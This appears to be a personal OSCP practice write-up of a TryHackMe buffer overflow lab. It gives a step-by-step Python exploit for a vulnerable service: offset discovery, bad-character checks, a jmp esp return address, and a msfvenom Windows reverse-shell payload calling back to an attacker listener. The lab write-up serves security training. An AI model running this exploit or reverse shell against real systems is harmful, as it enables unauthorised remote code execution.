OSCP report practice - TryHackMe bufferoverflow

The OSCP exam is getting close, so I am doing a few buffer overflow boxes to warm up. A while ago I happened to see a lab with a BOF on Twitter, so I came here to practice, and to practice writing a report at the same time.


Target machine:

https://tryhackme.com/room/bufferoverflowprep


This is the most basic kind of BOF, with no protections at all; it is mostly just walking through the standard procedure.

PS:

I went for a meal halfway through and restarted the lab machine, so the machine IP is different between the earlier and later parts. Don't mind it...

Snooping around the target




Create a Python script as the exploit skeleton and use msf-pattern_create to generate a unique string.

a@kali:~/Desktop/bof$ msf-pattern_create -l 1000

import socket

payload = b"PAYLOAD"  # replace with the msf-pattern_create output (as bytes)

s = socket.socket()
s.connect(('10.10.65.218', 1337))
print(s.recv(1024))
s.send(b'OVERFLOW2 ' + payload)  # the vulnerable command, followed by the pattern
s.close()

Note the value of EIP.



Use msf-pattern_offset to find the EIP offset:

a@kali:~/Desktop/bof$ msf-pattern_offset -l 1000 -q 76413176

[*] Exact match at offset 634
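To show what the two msf tools above actually do, here is an added example (my own code, not part of the original post or of Metasploit) that rebuilds the cyclic pattern and looks up the offset of the value read from EIP. The only assumptions are the Metasploit pattern layout (uppercase, lowercase, digit groups) and that the crash was produced with a 1000-byte pattern, as on this page.

```python
import string
import struct

# Added example, not from the original post: a re-implementation of what
# msf-pattern_create and msf-pattern_offset do, so the offset found above
# can be reproduced offline. The layout is the Metasploit one: 3-byte groups
# of uppercase letter, lowercase letter, digit, cycled in that order, which
# keeps every 4-byte window unique within the first 20280 bytes.


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("length exceeds the unique pattern space")
    groups = []
    size = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                size += 3
                if size >= length:
                    return "".join(groups)[:length].encode("ascii")
    return "".join(groups)[:length].encode("ascii")


def pattern_offset(length, eip_value):
    """Offset in the pattern of the 4 bytes that overwrote EIP.

    `eip_value` is the register value as the debugger shows it (0x76413176).
    x86 stores it little-endian, so the value is converted back to memory
    byte order before searching: 0x76413176 -> b"v1Av".
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found; was the crash produced with this pattern length?")
    return idx


if __name__ == "__main__":
    print(pattern_offset(1000, 0x76413176))  # matches msf-pattern_offset: 634
```

The byte-order step is the part people most often get wrong by hand: the debugger shows 0x76413176, but the bytes that sit in the pattern are `v1Av`, so the search has to use the packed little-endian form.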


Confirm the EIP offset:

payload = b"A"*634 + b"BBBB"  # EIP should now read 42424242

Check for bad chars. Remove \x00, \x0a and \x0d first:

payload = b"A"*634 + b"BBBB" + b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0B\x0C\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x5B\x5C\x5D\x5E\x5F\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x7B\x7C\x7D\x7E\x7F\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF"


Copy these chars from the hex dump and edit them into the same form as the Python string (this is easy to do with Sublime Text):


Create a Python script to check for bad chars automatically:

https://github.com/xiaopan233/OSCP-Script/blob/main/bof/badchars_check.py

rightChars = b"\xXX\xXX\xXX......"   # the chars in the Python payload (fill in)
memoryChars = b"\xXX\xXX\xXX......"  # the same bytes as read from the Immunity Debugger hex dump (fill in)
flag = 1
# compare byte by byte and stop at the first difference; bytes after a bad
# char are often shifted or corrupted too, so only the first mismatch counts
for i in range(min(len(rightChars), len(memoryChars))):
    if rightChars[i] != memoryChars[i]:
        print("[-] Find bad char!")
        print("[-] Current char: " + hex(rightChars[i]))
        if i != 0:
            print("[-] Previous char: " + hex(rightChars[i-1]))
        flag = 0
        break
if flag == 1:
    print("[+] Not Find bad char!")


Found a bad char: \x23.

Remove \x23 from the payload.


payload = b"A"*634 + b"BBBB" + b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0B\x0C\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x5B\x5C\x5D\x5E\x5F\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x7B\x7C\x7D\x7E\x7F\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF"

Then resend the payload and repeat the process above until no bad char is detected.



All detected bad chars:

\x23, \x3c, \x83, \xba
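The loop described above (send the probe, compare it with the hex dump, drop the first byte that differs, send again) can be automated. The following is an added example written for this page, not the post's own script and not the one linked above. It runs against a constructed stand-in for the target that silently drops a hidden set of bytes; the hidden set, the stand-in and the sample hex text are all made up for the demo, and on a real target the dump comes from the debugger.

```python
# Added example, not code from the original post: automates the bad-character
# loop (probe, compare with the hex dump, exclude the first mismatch, repeat)
# against a constructed stand-in for the target.


def build_probe(excluded):
    """All byte values 0x01..0xff except the ones already known to be bad."""
    return bytes(b for b in range(1, 256) if b not in excluded)


def hexdump_to_bytes(text):
    """Parse whitespace-separated hex pairs as copied from a hex dump window."""
    return bytes.fromhex("".join(text.split()))


def find_first_bad_char(sent, dumped):
    """Return the first byte of `sent` that is not in place in `dumped`, else None.

    Only the first mismatch is trustworthy: a stripped byte shifts every later
    byte, so everything after it looks corrupted as well. If the dump was cut
    short, the byte at the cut point is reported.
    """
    n = min(len(sent), len(dumped))
    for i in range(n):
        if sent[i] != dumped[i]:
            return sent[i]
    if len(dumped) < len(sent):
        return sent[n]
    return None


def simulated_target(data, hidden_bad=frozenset({0x23, 0x3c, 0x83, 0xba})):
    """Constructed stand-in for the target: silently drops bytes it cannot handle."""
    return bytes(b for b in data if b not in hidden_bad)


def find_all_bad_chars(send_and_dump, known=(0x00, 0x0a, 0x0d)):
    """Repeat probe/compare until a probe comes back intact; returns the new bad chars."""
    bad = set(known)
    while True:
        probe = build_probe(bad)
        dumped = send_and_dump(probe)
        found = find_first_bad_char(probe, dumped)
        if found is None:
            return sorted(bad - set(known))
        bad.add(found)


if __name__ == "__main__":
    print(["0x%02x" % b for b in find_all_bad_chars(simulated_target)])
```

Each round removes exactly one byte, which is why the manual procedure on this page takes four rounds to arrive at \x23, \x3c, \x83, \xba: after a dropped byte the rest of the dump is shifted by one, so reporting every mismatch at once would list almost the whole string.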

Next step: find a jmp esp address.

Type the command "!mona modules" to list all loaded modules.

Note the DLLs that have no protections enabled. For me the best choice is a DLL that ships with the vulnerable application itself.



Get the opcode of "jmp esp":

a@kali:~/Desktop$ msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp

"jmp esp" is not the only option; "jmp ebp", "call esp", "jmp eax" and so on can be used in the same way.

nasm > jmp ebp
00000000 FFE5 jmp ebp
nasm > call esp
00000000 FFD4 call esp
nasm > jmp eax
00000000 FFE0 jmp eax

Note that with a different instruction, the location where the shellcode has to be placed is different too.

Here I use the first DLL module, "essfunc.dll". Head over and search it for the address of the "jmp esp" opcode.


We test the address "0x625011af".

"jmp esp" sets EIP to the address ESP points to.

We can put some "\x90" (NOP) bytes after the "jmp esp" address in our payload to verify that it works.

Change the Python payload to the following:


payload = b"A"*634 + b"\xaf\x11\x50\x62" + b"\x90"*8  # the return address must be written in little-endian byte order: 0x625011af is sent as \xaf\x11\x50\x62
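Two things go wrong at this step in practice: the address is written in the wrong byte order, or it contains one of the bad chars found earlier and is altered on the way in, so the NOP test fails for no visible reason. The following added example (my own code, not from the post) packs the address with struct instead of by hand and refuses any address whose bytes collide with the bad-char set from this page. The offset and bad chars are the ones found above; the address that fails the check is a made-up value chosen only because it contains \xba.

```python
import struct

# Added example, not the original post's code: packs a return address in
# little-endian order and checks it against the bad chars found earlier.
BAD_CHARS = {0x00, 0x0a, 0x0d, 0x23, 0x3c, 0x83, 0xba}  # from this target
OFFSET = 634                                            # from msf-pattern_offset


def pack_return_address(addr, bad_chars=BAD_CHARS):
    """Return the 4 little-endian bytes of `addr`, or raise if any byte is bad."""
    packed = struct.pack("<I", addr)
    bad = [b for b in packed if b in bad_chars]
    if bad:
        raise ValueError("address 0x%08x contains bad byte(s): %s"
                         % (addr, ", ".join("0x%02x" % b for b in bad)))
    return packed


def build_test_payload(addr, nop_count=8, offset=OFFSET):
    """The verification payload from the post: filler, return address, NOP sled."""
    return b"A" * offset + pack_return_address(addr) + b"\x90" * nop_count


def offending_bytes(payload, bad_chars=BAD_CHARS, offset=OFFSET):
    """Bad bytes anywhere after the filler; should be empty before sending."""
    return sorted({b for b in payload[offset:] if b in bad_chars})


if __name__ == "__main__":
    p = build_test_payload(0x625011af)
    print(p[OFFSET:OFFSET + 4].hex(), len(p), offending_bytes(p))
    try:
        pack_return_address(0x6250ba11)  # made-up address containing 0xba
    except ValueError as e:
        print("rejected:", e)
```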

Check whether it works in Immunity Debugger:


It worked!

Use msfvenom to generate the shellcode.

Command:

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.132.252 LPORT=443 -f python -b "\x00\x0a\x0d\x23\x3c\x83\xba"


Modify our exploit:

import socket

buf = b""
...... # the shellcode generated by msfvenom goes here (its -f python output appends to buf)

payload = b"A"*634 + b"\xaf\x11\x50\x62" + b"\x90"*32 + buf  # keep a NOP sled between the return address and the shellcode

s = socket.socket()
s.connect(('10.10.15.141', 1337))
print(s.recv(1024))
s.send(b'OVERFLOW2 ' + payload)
s.close()


BOOM!!